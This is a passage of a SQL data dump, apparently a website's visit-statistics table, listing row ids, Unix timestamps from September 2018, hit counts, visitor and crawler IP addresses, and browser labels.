,'other'),(304745,1537351660,1,1,0,0,'77.75.144.115','chrome'),(304746,1537351882,1,1,0,0,'54.36.149.93','other'),(304747,1537352026,1,1,0,0,'54.36.148.68','other'),(304748,1537352142,1,1,0,0,'54.36.149.18','other'),(304749,1537352277,1,1,0,0,'37.53.96.185','chrome'),(304750,1537352402,1,1,0,0,'54.36.148.89','other'),(304751,1537352702,1,1,0,0,'54.36.149.19','other'),(304752,1537352750,2,2,0,0,'8.29.198.26','other'),(304753,1537352939,1,1,0,0,'54.36.148.57','other'),(304754,1537353161,1,1,0,0,'82.145.223.145','chrome'),(304755,1537353318,1,1,0,0,'54.36.148.95','other'),(304756,1537353322,1,1,0,0,'77.111.244.45','chrome'),(304757,1537353780,1,1,0,0,'95.134.203.229','chrome'),(304758,1537353897,1,1,0,0,'54.36.149.74','other'),(304759,1537354168,1,1,0,0,'54.36.149.33','other'),(304760,1537354295,1,1,0,0,'54.36.148.201','other'),(304761,1537354342,1,1,0,0,'54.36.148.86','other'),(304762,1537354640,1,1,0,0,'54.36.148.224','other'),(304763,1537354831,1,1,0,0,'54.36.148.144','other'),(304764,1537355031,1,1,0,0,'95.84.199.228','msie'),(304765,1537355066,1,1,0,0,'54.36.148.215','other'),(304766,1537355145,1,1,0,0,'176.120.38.254','chrome'),(304767,1537355225,1,1,0,0,'54.36.148.48','other'),(304768,1537355236,1,1,0,0,'46.201.125.163','chrome'),(304769,1537355518,1,1,0,0,'54.36.148.239','other'),(304770,1537355840,1,1,0,0,'54.36.148.35','other'),(304771,1537356060,8,8,0,0,'157.55.39.95','other'),(304772,1537356068,8,8,0,0,'207.46.13.28','other'),(304773,1537356076,8,8,0,0,'40.77.167.107','other'),(304774,1537356084,8,8,0,0,'157.55.39.190','other'),(304775,1537356166,1,1,0,0,'216.244.66.241','other'),(304776,1537356701,1,1,0,0,'91.196.178.93','firefox'),(304777,1537356961,1,1,0,0,'5.58.42.137','firefox'),(304778,1537357141,1,1,0,0,'178.93.148.129','chrome'),(304779,1537357229,1,1,0,0,'54.36.149.5','other'),(304780,1537357246,1,1,0,0,'54.36.148.58','other'),(304781,1537357262,1,1,0,0,'8.29.198.27','other'),(304782,1537357351,1,1,0,0,'130.180.210.25','chrome'),(304783,1537357468,2,2,0,0,'91.196.178.104','chrome'),(304784,1537357611,1,1,0,0,'54.36.148.127','other'),(304785,1537357661,1,1,0,0,'54.36.148.186','other'),(304786,1537357716,1,1,0,0,'54.36.149.101','other'),(304787,1537358063,1,1,0,0,'130.180.220.240','chrome'),(304788,1537358104,1,1,0,0,'54.36.148.172','other'),(304789,1537358230,1,1,0,0,'54.36.148.65','other'),(304790,1537358503,1,1,0,0,'40.77.167.107','other'),(304791,1537358916,1,1,0,0,'54.36.148.52','other'),(304792,1537358996,1,1,0,0,'162.210.196.97','other'),(304793,1537359147,1,1,0,0,'54.36.149.88','other'),(304794,1537359375,2,2,0,0,'95.134.12.251','chrome'),(304795,1537359784,1,1,0,0,'54.36.148.153','other'),(304796,1537359990,1,1,0,0,'194.44.74.78','chrome'),(304797,1537360197,1,1,0,0,'54.36.148.195','other'),(304798,1537360252,1,1,0,0,'92.113.189.235','chrome'),(304799,1537360375,1,1,0,0,'54.36.148.56','other'),(304800,1537360655,1,1,0,0,'54.36.148.89','other'),(304801,1537360910,34,34,0,0,'54.81.150.27','other'),(304802,1537361276,1,1,0,0,'54.36.148.200','other'),(304803,1537361713,1,1,0,0,'95.135.144.54','chrome'),(304804,1537361723,2,2,0,0,'178.154.244.29','other'),(304805,1537361814,1,1,0,0,'66.249.73.93','chrome'),(304806,1537361890,16,16,0,0,'54.81.150.27','other'),(304807,1537361901,1,1,0,0,'54.36.148.72','other'),(304808,1537361951,1,1,0,0,'52.15.39.148','chrome'),(304810,1537361953,31,31,0,0,'52.15.39.148','other'),(304811,1537361979,1,1,0,0,'54.36.148.52','other'),(304812,1537362132,1,1,0,0,'54.36.148.162','other'),(304813,1537362152,1,1,0,0,'91.196.178.130','chrome'),(304814,1537362313,1,1,0,0,'194.213.104.193','chrome'),(304815,1537362361,1,1,0,0,'54.36.148.107','other'),(304816,1537362448,1,1,0,0,'54.36.148.184','other'),(304817,1537362500,1,1,0,0,'54.36.148.175','other'),(304818,1537362770,1,1,0,0,'54.36.148.143','other'),(304819,1537362844,19,19,0,0,'54.81.150.27','other'),(304820,1537362849,1,1,0,0,'54.36.148.102','other'),(304821,1537362866,1,1,0,0,'54.36.149.13','other'),(304822,1537362946,1,1,0,0,'178.154.244.11','other'),(304823,1537363302,1,1,0,0,'216.244.66.241','other'),(304824,1537363353,1,1,0,0,'207.46.13.28','other'),(304825,1537363415,1,1,0,0,'54.36.148.158','other'),(304826,1537363534,1,1,0,0,'91.196.178.70','chrome'),(304827,1537363539,1,1,0,0,'194.213.104.193','chrome'),(304828,1537363547,1,1,0,0,'54.36.148.125','other'),(304829,1537363582,1,1,0,0,'178.154.244.62','other'),(304830,1537363649,1,1,0,0,'54.36.148.50','other'),(304831,1537363651,1,1,0,0,'37.55.204.218','chrome'),(304832,1537363667,1,1,0,0,'8.29.198.27','other'),(304833,1537363714,1,1,0,0,'66.249.65.155','chrome'),(304834,1537363716,1,1,0,0,'54.36.148.51','other'),(304835,1537363733,1,1,0,0,'8.29.198.26','other'),(304836,1537363754,12,12,0,0,'54.81.150.27','other'),(304837,1537363919,1,1,0,0,'54.36.148.208','other'),(304838,1537364097,1,1,0,0,'178.154.244.29','other'),(304839,1537364179,1,1,0,0,'178.154.244.11','other'),(304840,1537364497,1,1,0,0,'54.36.149.13','other'),(304841,1537364504,1,1,0,0,'216.244.66.241','other'),(304842,1537364673,16,16,0,0,'54.81.150.27','other'),(304843,1537364752,1,1,0,0,'54.36.148.50','other'),(304844,1537364830,1,1,0,0,'95.132.9.147','firefox'),(304845,1537364909,1,1,0,0,'54.36.149.66','other'),(304846,1537364982,1,1,0,0,'54.36.148.176','other'),(304847,1537365024,1,1,0,0,'54.36.148.255','other'),(304848,1537365275,1,1,0,0,'54.36.149.65','other'),(304849,1537365558,2,2,0,0,'216.244.66.241','other'),(304850,1537365610,3,3,0,0,'54.81.150.27','other'),(304851,1537365680,2,2,0,0,'95.132.35.174','chrome'),(304852,1537365719,1,1,0,0,'54.36.148.190','other'),(304853,1537365829,1,1,0,0,'54.36.148.77','other'),(304854,1537365924,1,1,0,0,'91.196.178.93','firefox'),(304855,1537366621,1,1,0,0,'194.213.104.193','chrome'),(304856,1537367340,1,1,0,0,'157.55.39.190','other'),(304857,1537368101,1,1,0,0,'8.29.198.27','other'),(304858,1537368237,1,1,0,0,'95.163.255.97','other'),(304859,1537368345,1,1,0,0,'54.36.149.43','other'),(304860,1537368662,1,1,0,0,'54.36.149.73','other'),(304861,1537368768,1,1,0,0,'54.36.148.51','other'),(304862,1537368831,1,1,0,0,'180.76.15.30','other'),(304863,1537368878,1,1,0,0,'54.36.148.153','other'),(304864,1537368957,1,1,0,0,'54.36.148.196','other'),(304865,1537369111,1,1,0,0,'54.36.148.92','other'),(304866,1537369171,1,1,0,0,'54.36.149.80','other'),(304867,1537369220,1,1,0,0,'91.196.178.92','chrome'),(304868,1537369311,1,1,0,0,'54.36.149.38','other'),(304869,1537369438,1,1,0,0,'46.211.124.192','chrome'),(304870,1537369632,1,1,0,0,'54.36.148.53','other'),(304871,1537369672,1,1,0,0,'54.36.148.31','other'),(304872,1537369977,1,1,0,0,'54.36.148.59','other'),(304873,1537369990,1,1,0,0,'216.244.66.241','other'),(304874,1537370232,1,1,0,0,'54.36.149.89','other'),(304875,1537370307,1,1,0,0,'188.230.43.254','other'),(304876,1537370485,1,1,0,0,'54.36.148.72','other'),(304877,1537370696,1,1,0,0,'54.36.149.60','other'),(304878,1537370879,1,1,0,0,'54.36.148.99','other'),(304879,1537370900,1,1,0,0,'54.36.149.72','other'),(304880,1537370947,1,1,0,0,'54.36.149.15','other'),(304881,1537371015,1,1,0,0,'54.36.148.202','other'),(304882,1537371340,1,1,0,0,'66.102.9.24','chrome'),(304883,1537371343,1,1,0,0,'54.36.149.16','other'),(304884,1537371420,1,1,0,0,'54.36.149.102','other'),(304885,1537371472,1,1,0,0,'54.36.149.77','other'),(304886,1537371583,4,4,0,0,'141.8.142.74','other'),(304887,1537371611,6,6,0,0,'178.154.244.62','other'),(304888,1537371638,1,1,0,0,'54.36.149.69','other'),(304889,1537371685,1,1,0,0,'54.36.149.100','other'),(304890,1537371816,1,1,0,0,'54.36.148.97','other'),(304891,1537371887,2,2,0,0,'178.154.244.34','other'),(304892,1537372037,1,1,0,0,'54.36.148.255','other'),(304893,1537372047,1,1,0,0,'54.36.149.76','other'),(304894,1537372179,1,1,0,0,'54.36.148.250','other'),(304895,1537372292,1,1,0,0,'54.36.149.74','other'),(304896,1537372446,1,1,0,0,'54.36.149.68','other'),(304897,1537372484,5,5,0,0,'141.8.142.74','other'),(304898,1537372658,1,1,0,0,'54.36.148.131','other'),(304899,1537372705,1,1,0,0,'188.230.43.254','other'),(304900,1537372721,1,1,0,0,'54.36.148.119','other'),(304901,1537372754,1,1,0,0,'54.36.149.24','other'),(304902,1537372896,2,2,0,0,'37.9.113.115','other'),(304903,1537372902,3,3,0,0,'37.9.113.182','other'),(304904,1537372948,1,1,0,0,'54.36.149.26','other'),(304905,1537372952,6,6,0,0,'178.154.244.62','other'),(304906,1537373123,1,1,0,0,'54.36.148.157','other'),(304907,1537373158,1,0,1,0,'66.249.65.156',''),(304908,1537373218,2,2,0,0,'178.154.244.34','other'),(304909,1537373233,1,1,0,0,'178.154.244.24','other'),(304910,1537373303,1,1,0,0,'54.36.148.240','other'),(304911,1537373326,1,1,0,0,'178.154.200.41','other'),(304912,1537373367,1,1,0,0,'37.9.113.101','other'),(304913,1537373468,2,2,0,0,'141.8.142.74','other'),(304914,1537373677,1,1,0,0,'54.36.149.7','other'),(304915,1537373701,1,1,0,0,'54.36.148.48','other'),(304916,1537373795,1,1,0,0,'66.249.65.157','chrome'),(304917,1537373955,1,1,0,0,'54.36.148.218','other'),(304918,1537374053,3,3,0,0,'37.9.113.182','other'),(304919,1537374105,1,1,0,0,'178.154.244.56','other'),(304920,1537374254,1,1,0,0,'37.9.113.157','other'),(304921,1537374298,1,1,0,0,'141.8.132.22','other'),(304922,1537374300,1,1,0,0,'178.154.200.28','other'),(304923,1537374319,1,1,0,0,'54.36.149.94','other'),(304924,1537374341,1,1,0,0,'54.36.148.25','other'),(304925,1537374343,1,1,0,0,'37.9.113.114','other'),(304926,1537374397,1,1,0,0,'40.77.167.107','other'),(304927,1537374458,1,1,0,0,'54.36.148.252','other'),(304928,1537374481,1,1,0,0,'54.36.149.91','other'),(304929,1537374522,1,1,0,0,'8.29.198.25','other'),(304930,1537374533,1,1,0,0,'54.36.149.6','other'),(304931,1537374582,1,1,0,0,'54.36.148.111','other'),(304932,1537374584,1,1,0,0,'8.29.198.27','other'),(304933,1537374598,4,4,0,0,'178.154.244.62','other'),(304934,1537374656,1,1,0,0,'37.9.113.110','other'),(304935,1537374795,1,1,0,0,'54.36.148.206','other'),(304936,1537374813,2,2,0,0,'178.154.244.34','other'),(304937,1537374835,8,8,0,0,'141.8.142.74','other'),(304938,1537375012,2,2,0,0,'37.9.113.182','other'),(304939,1537375040,1,1,0,0,'178.154.200.41','other'),(304940,1537375059,2,2,0,0,'178.154.244.24','other'),(304941,1537375096,1,1,0,0,'92.113.189.235','chrome'),(304942,1537375105,1,1,0,0,'188.230.43.254','other'),(304943,1537375164,1,1,0,0,'37.9.113.134','other'),(304944,1537375566,13,13,0,0,'178.154.244.62','other'),(304945,1537375737,3,3,0,0,'178.154.244.65','other'),(304946,1537375749,5,5,0,0,'141.8.142.74','other'),(304947,1537375853,1,1,0,0,'66.249.73.91','chrome'),(304948,1537375885,1,1,0,0,'91.196.178.178','chrome'),(304949,1537376041,1,1,0,0,'54.36.148.253','other'),(304950,1537376093,3,3,0,0,'37.9.113.182','other'),(304951,1537376183,1,1,0,0,'54.36.148.149','other'),(304952,1537376206,1,1,0,0,'54.36.148.56','other'),(304953,1537376223,1,1,0,0,'54.36.149.103','other'),(304954,1537376235,1,1,0,0,'54.36.148.107','other'),(304955,1537376341,1,1,0,0,'54.36.148.137','other'),(304956,1537376451,1,1,0,0,'54.36.148.46','other'),(304957,1537376694,1,1,0,0,'54.36.149.9','other'),(304958,1537376725,2,2,0,0,'178.154.244.34','other'),(304959,1537376796,10,10,0,0,'178.154.244.62','other'),(304960,1537376845,1,1,0,0,'54.36.148.53','other'),(304961,1537376902,7,7,0,0,'141.8.142.74','other'),(304962,1537377051,1,1,0,0,'37.9.113.100','other'),(304963,1537377115,1,1,0,0,'54.36.149.75','other'),(304964,1537377144,5,5,0,0,'37.9.113.182','other'),(304965,1537377335,1,1,0,0,'54.36.149.11','other'),(304966,1537377392,1,1,0,0,'178.154.244.24','other'),(304967,1537377406,1,1,0,0,'54.36.149.25','other'),(304968,1537377518,1,1,0,0,'178.154.200.41','other'),(304969,1537377544,1,1,0,0,'141.8.142.167','other'),(304970,1537377870,1,1,0,0,'54.36.148.130','other'),(304971,1537378044,1,1,0,0,'54.36.148.151','other'),(304972,1537378284,1,1,0,0,'54.36.149.5','other'),(304973,1537378581,1,1,0,0,'54.36.148.155','other'),(304974,1537378583,1,1,0,0,'66.249.73.89','chrome'),(304975,1537378596,1,1,0,0,'54.36.148.149','other'),(304976,1537378942,1,1,0,0,'8.29.198.26','other'),(304977,1537379059,1,1,0,0,'216.244.66.241','other'),(304978,1537379171,1,1,0,0,'54.36.148.27','other'),(304979,1537379347,1,1,0,0,'54.36.148.81','other'),(304980,1537379369,1,1,0,0,'157.55.39.95','other'),(304981,1537379463,1,1,0,0,'54.36.148.77','other'),(304982,1537379678,1,1,0,0,'54.36.148.115','other'),(304983,1537379803,1,1,0,0,'54.36.149.21','other'),(304984,1537379815,1,1,0,0,'66.249.65.155','chrome'),(304985,1537380328,1,1,0,0,'54.36.148.41','other'),(304986,1537380372,1,1,0,0,'54.36.149.60','other'),(304987,1537380473,6,6,0,0,'195.154.173.101','firefox'),(304988,1537380509,1,1,0,0,'54.36.149.101','other'),(304989,1537381038,1,1,0,0,'54.36.148.134','other'),(304990,1537381090,1,1,0,0,'54.36.149.57','other'),(304991,1537381111,1,1,0,0,'54.36.149.14','other'),(304992,1537381364,1,1,0,0,'54.36.148.151','other'),(304993,1537381431,1,1,0,0,'54.36.149.77','other'),(304994,1537381505,1,1,0,0,'54.36.149.81','other'),(304995,1537381769,1,1,0,0,'54.36.148.29','other'),(304996,1537381869,1,1,0,0,'54.36.149.12','other'),(304997,1537381878,1,1,0,0,'91.196.178.34','chrome'),(304998,1537382051,1,1,0,0,'54.36.148.91','other'),(304999,1537382198,1,1,0,0,'54.36.149.41','other'),(305000,1537382329,1,1,0,0,'54.36.148.200','other'),(305001,1537382359,1,1,0,0,'54.36.148.160','other'),(305002,1537382766,1,1,0,0,'54.36.148.223','other'),(305003,1537383279,1,1,0,0,'54.36.148.119','other'),(305004,1537383328,1,1,0,0,'216.244.66.241','other'),(305005,1537383391,1,1,0,0,'54.36.148.182','other'),(305006,1537383516,1,1,0,0,'54.36.148.167','other'),(305007,1537383759,1,1,0,0,'54.36.148.179','other'),(305008,1537383785,1,1,0,0,'54.36.148.74','other'),(305009,1537383810,1,1,0,0,'54.36.148.11','other'),(305010,1537383839,1,1,0,0,'54.36.149.38','other'),(305011,1537383855,1,1,0,0,'54.36.148.250','other'),(305012,1537383920,1,1,0,0,'54.36.148.142','other'),(305013,1537384109,1,1,0,0,'54.36.148.107','other'),(305014,1537384111,1,1,0,0,'54.36.148.206','other'),(305015,1537384132,6,6,0,0,'178.154.244.29','other'),(305016,1537384136,15,15,0,0,'178.154.244.11','other'),(305017,1537384175,1,1,0,0,'54.36.148.34','other'),(305018,1537384188,2,2,0,0,'141.8.142.103','other'),(305019,1537384221,1,1,0,0,'95.108.181.75','other'),(305020,1537384223,1,1,0,0,'178.154.200.48','other'),(305021,1537384226,4,4,0,0,'5.45.207.79','other'),(305022,1537384228,1,1,0,0,'54.36.148.184','other'),(305023,1537384294,1,1,0,0,'54.36.149.12','other'),(305024,1537384395,1,1,0,0,'54.36.148.247','other'),(305025,1537384646,2,2,0,0,'91.196.178.136','chrome'),(305026,1537384714,2,2,0,0,'37.9.113.148','other'),(305027,1537384716,3,3,0,0,'5.45.207.19','other'),(305028,1537384724,1,1,0,0,'95.108.213.4','other'),(305029,1537384794,1,1,0,0,'54.36.149.42','other'),(305030,1537384856,1,1,0,0,'54.36.149.6','other'),(305031,1537385360,1,1,0,0,'8.29.198.26','other'),(305032,1537385421,1,1,0,0,'8.29.198.27','other'),(305033,1537385429,1,1,0,0,'54.36.148.15','other'),(305034,1537385435,1,1,0,0,'54.36.149.94','other'),(305035,1537385650,1,1,0,0,'54.36.148.82','other'),(305036,1537385695,1,1,0,0,'54.36.148.188','other'),(305037,1537385943,1,1,0,0,'54.36.148.20','other'),(305038,1537386189,1,1,0,0,'54.36.149.100','other'),(305039,1537386249,1,1,0,0,'54.36.148.232','other'),(305040,1537386391,1,1,0,0,'54.36.148.119','other'),(305041,1537386475,1,1,0,0,'54.36.149.41','other'),(305042,1537386531,1,1,0,0,'216.244.66.241','other'),(305043,1537386654,1,1,0,0,'54.36.149.98','other'),(305044,1537386719,1,1,0,0,'54.36.148.210','other'),(305045,1537386747,1,1,0,0,'54.36.148.67','other'),(305046,1537386767,1,1,0,0,'54.36.148.11','other'),(305047,1537387101,1,1,0,0,'207.46.13.28','other'),(305048,1537387311,1,1,0,0,'54.36.149.8','other'),(305049,1537387408,1,1,0,0,'54.36.148.208','other'),(305050,1537387942,1,1,0,0,'54.36.149.71','other'),(305051,1537388115,1,1,0,0,'54.36.149.54','other'),(305052,1537388433,6,6,0,0,'195.154.173.101','firefox'),(305053,1537388477,2,2,0,0,'54.36.149.56','other'),(305054,1537388754,1,1,0,0,'54.36.149.75','other'),(305055,1537388891,1,1,0,0,'216.244.66.241','other'),(305056,1537388933,1,1,0,0,'54.36.148.32','other'),(305057,1537389016,1,1,0,0,'54.36.148.167','other'),(305058,1537389130,1,1,0,0,'54.36.149.37','other'),(305059,1537389300,1,1,0,0,'66.249.65.157','chrome'),(305060,1537389484,1,1,0,0,'54.36.148.12','other'),(305061,1537389575,1,1,0,0,'54.36.149.68','other'),(305062,1537389630,1,1,0,0,'54.36.148.166','other'),(305063,1537389773,1,1,0,0,'8.29.198.27','other'),(305064,1537389896,1,1,0,0,'54.36.149.94','other'),(305065,1537390396,1,1,0,0,'54.36.148.221','other'),(305066,1537390974,1,1,0,0,'54.36.148.50','other'),(305067,1537391038,1,1,0,0,'54.36.149.61','other'),(305068,1537391116,1,1,0,0,'54.36.149.37','other'),(305069,1537391128,1,1,0,0,'54.36.148.161','other'),(305070,1537391225,2,2,0,0,'54.36.149.56','other'),(305071,1537391252,1,1,0,0,'40.77.167.107','other'),(305072,1537391272,1,1,0,0,'54.36.148.216','other'),(305073,1537391412,1,1,0,0,'54.36.149.38','other'),(305074,1537391483,1,1,0,0,'54.36.149.36','other'),(305075,1537391969,1,1,0,0,'54.36.149.101','other'),(305076,1537392225,1,1,0,0,'54.36.149.94','other'),(305077,1537392251,1,1,0,0,'54.36.148.79','other'),(305078,1537392576,1,1,0,0,'54.36.148.74','other'),(305079,1537392872,1,1,0,0,'54.36.148.232','other'),(305080,1537393108,1,1,0,0,'54.36.149.36','other'),(305081,1537393428,1,1,0,0,'54.36.148.27','other'),(305082,1537393457,1,1,0,0,'54.36.149.56','other'),(305083,1537393786,2,2,0,0,'40.77.167.107','other'),(305084,1537394855,1,1,0,0,'95.108.213.4','other'),(305085,1537394912,1,1,0,0,'141.8.142.103','other'),(305086,1537394947,1,1,0,0,'178.154.244.29','other'),(305087,1537394992,1,1,0,0,'5.45.207.79','other'),(305088,1537395193,1,1,0,0,'91.196.178.102','other'),(305089,1537395364,2,2,0,0,'178.154.244.11','other'),(305090,1537395472,1,1,0,0,'141.8.142.108','other'),(305091,1537396187,1,1,0,0,'8.29.198.27','other'),(305092,1537396257,1,1,0,0,'8.29.198.25','other'),(305093,1537396664,1,1,0,0,'216.244.66.241','other'),(305094,1537397343,1,1,0,0,'157.55.39.95','other'),(305095,1537397347,1,1,0,0,'95.152.63.76','firefox'),(305096,1537398520,1,1,0,0,'180.76.15.21','other'),(305097,1537398617,1,1,0,0,'216.244.66.241','other'),(305098,1537400377,1,1,0,0,'54.36.149.13','other'),(305099,1537400603,1,1,0,0,'8.29.198.27','other'),(305100,1537400756,1,1,0,0,'54.36.149.46','other'),(305101,1537401070,1,1,0,0,'54.36.148.248','other'),(305102,1537401071,1,1,0,0,'5.45.207.79','other'),(305103,1537401290,1,1,0,0,'54.36.148.207','other'),(305104,1537401642,1,1,0,0,'54.36.148.153','other'),(305105,1537402528,1,1,0,0,'54.36.148.79','other'),(305106,1537402593,1,1,0,0,'54.36.148.96','other'),(305107,1537402676,1,1,0,0,'54.36.148.203','other'),(305108,1537402722,1,1,0,0,'54.36.148.28','other'),(305109,1537402740,1,1,0,0,'54.36.148.19','other'),(305110,1537402862,1,1,0,0,'54.36.148.100','other'),(305111,1537403090,1,1,0,0,'54.36.149.64','other'),(305112,1537403264,1,1,0,0,'54.36.148.140','other'),(305113,1537403301,1,1,0,0,'54.36.148.113','other'),(305114,1537403343,1,1,0,0,'54.36.148.204','other'),(305115,1537403742,1,1,0,0,'54.36.149.104','other'),(305116,1537403776,1,1,0,0,'54.36.149.89','other'),(305117,1537403822,1,1,0,0,'54.36.149.102','other'),(305118,1537404163,1,1,0,0,'54.36.148.147','other'),(305119,1537404197,1,1,0,0,'54.36.148.56','other'),(305120,1537404661,1,1,0,0,'54.36.148.120','other'),(305121,1537405139,1,1,0,0,'216.244.66.241','other'),(305122,1537405562,1,1,0,0,'178.154.244.29','other'),(305123,1537406259,1,1,0,0,'54.36.148.75','other'),(305124,1537406403,1,1,0,0,'157.55.39.190','other'),(305125,1537406501,1,1,0,0,'54.36.149.22','other'),(305126,1537406526,1,1,0,0,'54.36.148.239','other'),(305127,1537406630,1,1,0,0,'216.244.66.241','other'),(305128,1537406684,1,1,0,0,'178.154.244.11','other'),(305129,1537406817,1,1,0,0,'54.36.148.204','other'),(305130,1537406946,1,1,0,0,'54.36.148.107','other'),(305131,1537407010,2,2,0,0,'8.29.198.25','other'),(305132,1537407139,1,1,0,0,'54.36.148.141','other'),(305133,1537407428,1,1,0,0,'54.36.149.79','other'),(305134,1537407734,1,1,0,0,'54.36.148.193','other'),(305135,1537407965,1,1,0,0,'54.36.148.22','other'),(305136,1537408165,1,1,0,0,'52.37.211.217','chrome'),(305137,1537408349,1,1,0,0,'54.36.148.149','other'),(305138,1537408432,1,1,0,0,'54.36.148.248','other'),(305139,1537409026,1,1,0,0,'54.36.149.2','other'),(305140,1537409259,1,1,0,0,'54.36.148.152','other'),(305141,1537409301,1,1,0,0,'54.36.149.92','other'),(305142,1537409305,1,1,0,0,'54.36.148.49','other'),(305143,1537409462,1,1,0,0,'54.36.148.230','other'),(305144,1537409595,1,1,0,0,'54.36.149.12','other'),(305145,1537409605,1,1,0,0,'5.9.155.37','other'),(305146,1537410129,1,1,0,0,'54.36.148.69','other'),(305147,1537410178,1,1,0,0,'54.36.148.218','other'),(305148,1537410187,1,1,0,0,'54.36.148.12','other'),(305149,1537410227,1,1,0,0,'54.36.148.35','other'),(305150,1537410517,1,1,0,0,'54.36.148.171','other'),(305151,1537410950,2,2,0,0,'54.36.148.146','other'),(305152,1537411105,2,2,0,0,'178.154.244.29','other'),(305153,1537411183,1,1,0,0,'54.36.149.91','other'),(305154,1537411195,1,1,0,0,'54.36.148.50','other'),(305155,1537411399,1,1,0,0,'54.36.148.190','other'),(305156,1537411436,1,1,0,0,'8.29.198.27','other'),(305157,1537411631,1,1,0,0,'54.36.148.207','other'),(305158,1537411975,1,1,0,0,'5.45.207.79','other'),(305159,1537412200,1,1,0,0,'35.162.70.167','chrome'),(305160,1537412416,1,1,0,0,'54.36.149.21','other'),(305161,1537412442,1,1,0,0,'54.36.148.195','other'),(305162,1537412515,1,1,0,0,'54.36.149.84','other'),(305163,1537412516,1,1,0,0,'180.76.15.154','other'),(305164,1537412678,1,1,0,0,'54.36.148.152','other'),(305165,1537413006,1,1,0,0,'178.154.244.11','other'),(305166,1537413017,1,1,0,0,'87.250.224.65','other'),(305167,1537413074,1,1,0,0,'54.36.149.25','other'),(305168,1537413176,1,1,0,0,'54.36.148.201','other'),(305169,1537413264,1,1,0,0,'54.36.148.47','other'),(305170,1537413338,1,1,0,0,'54.36.148.20','other'),(305171,1537413481,1,1,0,0,'54.36.148.125','other'),(305172,1537413496,1,1,0,0,'54.36.148.189','other'),(305173,1537413868,1,1,0,0,'54.36.148.243','other'),(305174,1537414028,1,1,0,0,'54.36.148.19','other'),(305175,1537414216,1,1,0,0,'54.36.148.198','other'),(305176,1537414355,1,1,0,0,'157.55.39.190','other'),(305177,1537414369,1,1,0,0,'66.249.73.91','chrome'),(305178,1537414456,1,1,0,0,'54.36.149.80','other'),(305179,1537414617,1,1,0,0,'54.36.149.99','other'),(305180,1537414818,1,1,0,0,'54.36.148.47','other'),(305181,1537415037,1,1,0,0,'54.36.149.95','other'),(305182,1537415172,1,1,0,0,'54.36.148.50','other'),(305183,1537415380,1,1,0,0,'54.36.148.234','other'),(305184,1537415569,1,1,0,0,'54.36.148.207','other'),(305185,1537415614,1,1,0,0,'157.55.39.95','other'),(305186,1537415726,1,1,0,0,'141.8.142.103','other'),(305187,1537415730,1,1,0,0,'5.45.207.19','other'),(305188,1537415847,1,1,0,0,'54.36.148.164','other'),(305189,1537415863,1,1,0,0,'54.36.148.239','other'),(305190,1537415931,1,1,0,0,'54.36.148.54','other'),(305191,1537416419,1,1,0,0,'54.36.148.233','other'),(305192,1537416622,1,1,0,0,'54.36.148.18','other'),(305193,1537416681,1,1,0,0,'54.36.148.46','other'),(305194,1537416715,1,1,0,0,'54.36.149.48','other'),(305195,1537416724,1,1,0,0,'54.36.148.10','other'),(305196,1537416868,1,1,0,0,'54.36.149.85','other'),(305197,1537417071,1,1,0,0,'54.36.148.29','other'),(305198,1537417072,1,1,0,0,'54.36.148.164','other'),(305199,1537417409,1,1,0,0,'178.154.244.29','other'),(305200,1537417604,1,1,0,0,'54.36.148.226','other'),(305201,1537417837,2,2,0,0,'8.29.198.25','other'),(305202,1537417904,1,1,0,0,'54.36.148.221','other'),(305203,1537418200,1,1,0,0,'54.36.148.240','other'),(305204,1537418251,1,1,0,0,'54.36.148.23','other'),(305205,1537418678,7,7,0,0,'178.154.244.29','other'),(305206,1537418681,4,4,0,0,'178.154.244.11','other'),(305207,1537418689,1,1,0,0,'5.45.207.19','other'),(305208,1537418692,1,1,0,0,'5.45.207.79','other'),(305209,1537418742,1,1,0,0,'54.36.148.45','other'),(305210,1537419070,1,1,0,0,'54.36.148.202','other'),(305211,1537419301,1,1,0,0,'54.36.149.86','other'),(305212,1537419931,1,1,0,0,'54.36.148.23','other'),(305213,1537420034,1,1,0,0,'178.154.244.29','other'),(305214,1537420337,1,1,0,0,'54.36.149.32','other'),(305215,1537420515,1,1,0,0,'130.180.219.77','chrome'),(305216,1537420671,2,2,0,0,'54.165.59.7','other'),(305217,1537422259,1,1,0,0,'77.93.41.218','chrome'),(305218,1537422271,1,1,0,0,'8.29.198.27','other'),(305219,1537423680,1,1,0,0,'91.211.132.226','chrome'),(305220,1537424032,1,1,0,0,'54.36.148.123','other'),(305221,1537424144,1,1,0,0,'54.36.148.157','other'),(305222,1537424179,1,1,0,0,'82.145.221.128','chrome'),(305223,1537424315,1,1,0,0,'54.36.149.58','other'),(305224,1537424466,1,1,0,0,'173.212.233.72','other'),(305225,1537424468,1,1,0,0,'173.212.233.72','msie'),(305226,1537424582,1,1,0,0,'54.36.148.205','other'),(305227,1537424806,1,1,0,0,'54.36.148.146','other'),(305228,1537425095,1,1,0,0,'54.36.149.32','other'),(305229,1537425443,1,1,0,0,'54.36.148.156','other'),(305230,1537425622,1,1,0,0,'54.36.148.204','other'),(305231,1537425646,1,1,0,0,'94.179.147.128','chrome'),(305232,1537425806,1,1,0,0,'54.36.149.55','other'),(305233,1537426226,1,1,0,0,'54.36.149.35','other'),(305234,1537426243,1,1,0,0,'54.36.148.112','other'),(305235,1537426308,1,1,0,0,'54.36.149.91','other'),(305236,1537426382,1,1,0,0,'54.36.148.30','other'),(305237,1537427178,1,1,0,0,'54.36.149.45','other'),(305238,1537427381,1,1,0,0,'157.55.39.190','other'),(305239,1537427608,1,1,0,0,'78.111.186.5','chrome'),(305240,1537427714,1,1,0,0,'54.36.148.131','other'),(305241,1537427779,1,1,0,0,'54.36.148.156','other'),(305242,1537427812,1,1,0,0,'54.36.148.59','other'),(305243,1537428002,1,1,0,0,'54.36.149.6','other'),(305244,1537428034,1,1,0,0,'54.165.59.7','other'),(305245,1537428043,1,1,0,0,'54.36.149.33','other'),(305246,1537428128,1,1,0,0,'46.211.157.48','chrome'),(305247,1537428131,1,1,0,0,'46.201.125.163','chrome'),(305248,1537428293,1,1,0,0,'95.132.23.200','chrome'),(305249,1537428519,1,1,0,0,'54.36.148.57','other'),(305250,1537428663,2,2,0,0,'8.29.198.27','other'),(305251,1537428718,1,1,0,0,'91.196.178.94','firefox'),(305252,1537428975,1,1,0,0,'54.36.149.99','other'),(305253,1537429043,1,1,0,0,'91.196.178.165','chrome'),(305254,1537429319,1,1,0,0,'54.36.148.115','other'),(305255,1537429402,1,1,0,0,'54.36.148.111','other'),(305256,1537429813,1,1,0,0,'54.36.149.60','other'),(305257,1537429836,1,1,0,0,'54.36.149.85','other'),(305258,1537429995,1,1,0,0,'54.36.148.192','other'),(